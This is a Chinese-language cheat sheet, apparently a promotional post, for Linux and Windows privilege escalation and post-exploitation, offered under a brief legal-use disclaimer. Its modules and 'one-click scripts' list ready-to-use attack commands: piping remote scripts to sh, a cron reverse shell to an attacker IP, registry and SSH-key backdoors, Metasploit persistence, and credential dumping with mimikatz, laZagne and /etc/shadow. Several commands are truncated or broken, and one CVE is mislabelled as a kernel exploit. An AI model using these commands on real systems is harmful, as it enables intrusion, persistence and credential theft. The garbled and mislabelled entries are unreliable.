【目录】
1. 合规使用声明
2. 模块一:本地信息枚举(提权前置)
3. 模块二:Linux 本地提权工具
4. 模块三:Windows 本地提权工具
5. 模块四:后渗透维持访问
6. 模块五:后渗透信息窃取
7. 模块六:实战提权+后渗透组合流程
8. 常用一键脚本
---
1. 合规使用声明
本手册仅用于合法授权渗透测试、企业安全加固、网络安全教学研究。
任何未经授权对目标主机/网络进行权限提升、控制、数据窃取的行为,均属于违法,将承担相应民事及刑事责任。
---
模块一:本地信息枚举(提权前置)
1.1 LinPEAS
- 命令:linpeas.sh
- 作用:Linux 主机全面信息枚举,自动查找提权漏洞
- 示例:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
1.2 WinPEAS
- 命令:winPEASx64.exe
- 作用:Windows 主机信息枚举,自动挖掘提权路径
- 示例:
cmd
winPEASx64.exe quiet
1.3 enum4linux
- 命令:enum4linux
- 作用:Windows/SMB 信息枚举(用户、共享、RID)
- 示例:enum4linux -a 192.168.1.100
1.4 unix-privesc-check
- 命令:unix-privesc-check
- 作用:类 Unix 系统权限配置审计
- 示例:unix-privesc-check standard
---
模块二:Linux 本地提权工具
2.1 sudo -l
- 命令:sudo -l
- 作用:查看当前用户可无密码 sudo 的命令
- 示例:sudo -l
2.2 pkexec
- 命令:pkexec
- 作用:利用 polkit 漏洞本地提权(CVE-2021-4034)
- 示例:
pkexec /bin/
2.3 cve-2023-2825
- 命令:exp
- 作用:内核漏洞本地提权
- 示例:
gcc exp.c -o exp && ./exp
2.4 find 提权
- 命令:find
- 作用:利用 find 权限绕过获取 root shell
- 示例:
find . -exec /bin/ \; -quit
---
模块三:Windows 本地提权工具
3.1 juicy-potato
- 命令:JuicyPotato.exe
- 作用:利用 COM 组件权限提升至 SYSTEM
- 示例:
cmd
JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -l 1337
3.2 printspoofer
- 命令:PrintSpoofer.exe
- 作用:利用 Print Spooler 提权至 SYSTEM
- 示例:
cmd
PrintSpoofer.exe -i -c cmd
3.3 godpotato
- 命令:GodPotato.exe
- 作用:Windows 综合提权工具,适配多种系统版本
- 示例:
cmd
GodPotato.exe -cmd "cmd /c whoami"
3.4 seabiscuit
- 命令:SeaBiscuit.exe
- 作用:针对 Windows 服务配置错误提权
- 示例:
cmd
SeaBiscuit.exe
---
模块四:后渗透维持访问
4.1 metasploit persistence
- 命令:run persistence
- 作用:MSF 后渗透持久化后门
- 示例:
run persistence -X -i 60 -p 4444 -r 192.168.1.10
4.2 ssh key 留后门
- 命令:ssh-keygen
- 作用:写入公钥实现无密码 SSH 登录
- 示例:
ssh-keygen
cat id_rsa.pub >> ~/.ssh/authorized_keys
4.3 registry persistence(Windows)
- 命令:reg add
- 作用:注册表开机自启维持访问
- 示例:
cmd
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "c:\shell.exe"
4.4 cron 定时任务(Linux)
- 命令:crontab
- 作用:定时反弹 shell 维持权限
- 示例:
echo "* * * * * -i >& /dev/tcp/192.168.1.10/4444 0>&1" | crontab -
---
模块五:后渗透信息窃取
5.1 mimikatz
- 命令:mimikatz.exe
- 作用:Windows 明文密码、哈希、票据抓取
- 示例:
cmd
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
5.2 laZagne
- 命令:laZagne.exe
- 作用:跨软件密码读取(浏览器、数据库、聊天工具)
- 示例:
cmd
laZagne.exe all
5.3 hashdump
- 命令:hashdump
- 作用:MSF 直接导出 Windows 账户哈希
- 示例:
hashdump
5.4 /etc/shadow 读取(Linux)
- 命令:cat /etc/shadow
- 作用:读取 Linux 账户密码哈希
- 示例:
cat /etc/shadow
---
模块六:实战提权+后渗透组合流程
流程1:Linux 靶机完整流程
1. 信息枚举:curl linpeas.sh | sh
2. 发现 sudo 无密码 NOPASSWD: ALL
3. 提权:sudo /bin/
4. 留后门:写入 SSH 公钥
5. 信息窃取:cat /etc/shadow
流程2:Windows 靶机完整流程
1. 信息枚举:运行 winPEASx64.exe
2. 发现 Print Spooler 漏洞
3. 提权:PrintSpoofer.exe -i -c cmd
4. 抓取密码:mimikatz 导出明文密码
5. 维持访问:注册表添加自启动项
---
常用一键脚本
Linux 一键信息枚举
curl -L https://linpeas.sh | sh
Linux 一键定时反弹 shell
echo "* * * * * -i >& /dev/tcp/你的IP/4444 0>&1" | crontab -
Windows 一键密码抓取
laZagne.exe all > pass.txt
MSF 一键持久化
run persistence -X -p 4444 -r 你的IP
点击阅读原文,学习Kali与编程最全课